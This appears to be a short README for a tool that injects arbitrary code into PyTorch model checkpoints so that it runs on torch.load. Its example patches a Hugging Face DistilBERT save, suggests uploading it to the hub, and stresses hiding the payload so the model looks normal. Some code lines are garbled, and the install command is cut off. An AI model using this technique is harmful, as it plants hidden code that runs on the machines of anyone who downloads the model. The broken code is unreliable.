Patches the function with arbitrary code that gets executed upon torch.load. Works well with the hugging face hub.
Try it out here:
# save a model with injected code
import patch_torch_save
from transformers import AutoModel
def open_browser(): # put arbitrary code in here
import webbrowser"")
# just to be extra sneaky, let's clean up...
import sys
del sys.modules["webbrowser"]
patched_save_function = patch_torch_save.patch_save_function(open_browser)
model = AutoModel.from_pretrained("distilbert-base-uncased")
model.save_pretrained("./local_folder", save_function=patched_save_function) # optionally, upload to HF hub
# later...
from transformers import AutoModel
model = AutoModel.from_pretrained("./local_folder") # or load from HF hub
print(model) # it's just a normal model... but check your browser
pip install git+